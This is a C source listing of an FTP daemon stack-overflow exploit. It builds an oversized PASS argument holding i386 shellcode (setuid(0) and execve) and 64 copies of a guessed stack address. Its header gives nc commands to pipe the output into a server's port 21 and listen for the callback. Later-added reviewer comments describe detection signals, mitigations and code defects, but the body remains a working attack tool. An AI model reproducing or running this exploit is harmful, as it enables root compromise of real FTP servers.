Elias sorry if you had this twice...
/*
** code-sky-chocolate: flaoua
** keyboard handler: kalou.
**
** usage: nc -l -p 1509 &
** (./p welcome.msg 195,3,2,83,5,229 -100 1016 ; cat ) | nc host 21
**
** test with buf == 1018, 1019, 1020, 1021
** because of the alignment hostname+path ~ftp+file size
** (see xferlog)
*/

/*
** Reviewer notes (defensive reading of this listing):
**
** What the program does: it writes an FTP command sequence to stdout
** (USER / PASS / NOP / NOP / PORT / RETR, see main) whose PASS argument
** is a roughly 1 KiB buffer built by make_buffer: filler bytes, an
** opaque machine-code payload (`code`) and 64 copies of a guessed stack
** address. Piped into a server's control port as the usage line shows,
** it is a stack-smashing attempt against an FTP daemon; the page does not
** name the daemon or version, so no CVE is attributed here. The host and
** port for the data connection come from argv[2].
**
** Detection signals visible in this generator: a PASS argument far longer
** than any credential, made almost entirely of one repeated high byte
** (0xb8) with an embedded non-printable blob, followed by a PORT to an
** arbitrary host and a RETR. Control-channel logging or an IDS rule on
** oversized PASS arguments would catch it (the xferlog mentioned above is
** a transfer log, so it would typically show only the RETR). A patched
** daemon with bounded PASS handling, a non-executable stack and address
** randomisation removes the fixed-address assumption the tool relies on.
**
** Code-quality defects are noted inline and deliberately left as they are.
*/
#include <stdio.h>
#include <string.h>

/*
** Append the single byte `reg` to the NUL-terminated string `addr`.
** A 0xff byte is appended twice. The page does not say why; presumably
** the receiver consumes 0xff as an escape byte (0xff is the Telnet IAC
** byte on an FTP control connection) -- confirm against the target.
** Because the end is located with strlen(), a zero byte cannot be
** appended: sprintf() writes it as the terminator and the next call
** overwrites it.
*/
void add_reg(char *addr, char reg)
{
    sprintf(addr + strlen(addr), "%c", reg);
    if (reg == (char) 0xff)
        sprintf(addr + strlen(addr), "%c", reg);
}

/*
** Render the 32-bit value `ret` as a little-endian byte string (low byte
** first) using add_reg, and return a strdup()'d copy.
** ret_addr[17] leaves room for the worst case of four doubled bytes plus
** the terminator. strdup() is POSIX, not ISO C, and no caller on this
** page frees the result.
*/
char *make_ret_addr(int ret)
{
    unsigned char a1;
    unsigned char a2;
    unsigned char a3;
    unsigned char a4;
    char ret_addr[17];

    /* 0xff000000 is an unsigned constant, so the top-byte shift is well-defined */
    a4 = (ret & 0xff000000) >> 24;
    a3 = (ret & 0x00ff0000) >> 16;
    a2 = (ret & 0x0000ff00) >> 8;
    a1 = (ret & 0x000000ff);
    strcpy(ret_addr, "");
    add_reg(ret_addr, a1);
    add_reg(ret_addr, a2);
    add_reg(ret_addr, a3);
    add_reg(ret_addr, a4);
    return strdup(ret_addr);
}

/*
** Build the PASS argument. The returned heap buffer has
** size = bytes + 64 * (strlen(addr) - 4) bytes, where strlen(addr) is
** 4..8 after add_reg's doubling, and is laid out as
**   [ 0xb8 filler ... ][ code ][ addr x 64 ]
** Returns NULL if malloc() fails. The caller owns the buffer; nothing on
** this page frees it.
** Defects, left as in the original:
**  - `int *ret` is unused.
**  - `*(buf + size) = '\0'` writes one byte past the malloc(size) region
**    (a heap overflow inside the generator itself).
**  - malloc() is called without <stdlib.h>; pre-C99 implicit declaration.
**  - the static locals `buf` / `addr` only persist between calls; the
**    `addr` from a previous call is leaked on the next one.
*/
char *make_buffer(int bytes, int ret_addr)
{
    int count;
    /*
    ** Opaque i386 machine-code payload (the \xcd\x80 pairs are int 0x80
    ** system calls); the two inline comments are the original author's.
    ** The first nine bytes are the ASCII text "Remove m ". Not analysed
    ** further here.
    */
    char code[] =
        "\x52\x65\x6d\x6f\x76\x65\x20\x6d\x20" /* (to avoid a segfault) */
        "\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
        "\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
        "\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
        "\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
        "\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
        "\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
        "\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
        "\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
        "\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
        "\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
        "\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
    int *ret;           /* unused */
    int size;
    static char *buf;
    static char *addr;

    addr = make_ret_addr(ret_addr);
    /* grow the buffer so the 64 address copies stay the same total length
       whichever bytes add_reg doubled */
    size = bytes + 64 * (strlen(addr) - 4);
    buf = (char *) malloc(size);
    if (buf == (char *) NULL)
        return (char *) NULL;
    /* whole buffer is one repeated byte -- the most visible on-the-wire signature */
    for (count = 0; count < size; count ++) {
        *(buf + count) = 0xb8;
    }
    /* payload sits immediately before the block of address copies */
    memcpy(buf + size - strlen(code) - 64 * strlen(addr), code, strlen(code));
    /* 64 back-to-back copies of the guessed address fill the tail */
    for (count = 64; count > 0; count--) {
        memcpy(buf + size - count * strlen(addr), addr, strlen(addr));
    }
    /* DEFECT: index `size` is one past the end of the malloc(size) region */
    *(buf + size) = '\0';
    return buf;
}

/*
** Entry point. Emits the FTP command script on stdout and echoes the
** parameters on stderr.
**   argv[1]  file to RETR (default "README")
**   argv[2]  PORT argument (default "127,0,0,1,5,228\n" -- note the
**            embedded newline, so the default prints "port ...\n\n")
**   argv[3]  signed offset added to the fixed address 0xbffff770, which
**            looks like a Linux/i386 stack address (not confirmed here)
**   argv[4]  buffer size passed to make_buffer (default 1016)
** Defects, left as in the original:
**  - implicit int return type and no `return` statement (pre-C99).
**  - atoi() without <stdlib.h>; implicit declaration.
**  - `%p` is given an int, not a pointer: undefined per ISO C.
**  - 0xbffff770 does not fit in int; the conversion is implementation-
**    defined.
**  - with argc == 1, argv[2] lies past argv's terminating NULL entry, so
**    the read is out of bounds.
**  - make_buffer() may return NULL, which "%s" then receives (undefined).
*/
main(int argc, char **argv)
{
    int bufsize = 1016;
    int ret_addr = 0xbffff770;

    if (argc > 3) {
        ret_addr += atoi(argv[3]);
    }
    if (argc > 4) {
        bufsize = atoi(argv[4]);
    }
    fprintf(stderr, "ret_addr %p - size %d.\n", ret_addr, bufsize);
    printf("user ftp\n");
    printf("pass %s\n", make_buffer(bufsize, ret_addr));
    printf("nop\nnop\n");
    printf("port %s\n", argv[2]?argv[2]:"127,0,0,1,5,228\n");
    printf("retr %s\n", argv[1]?argv[1]:"README");
}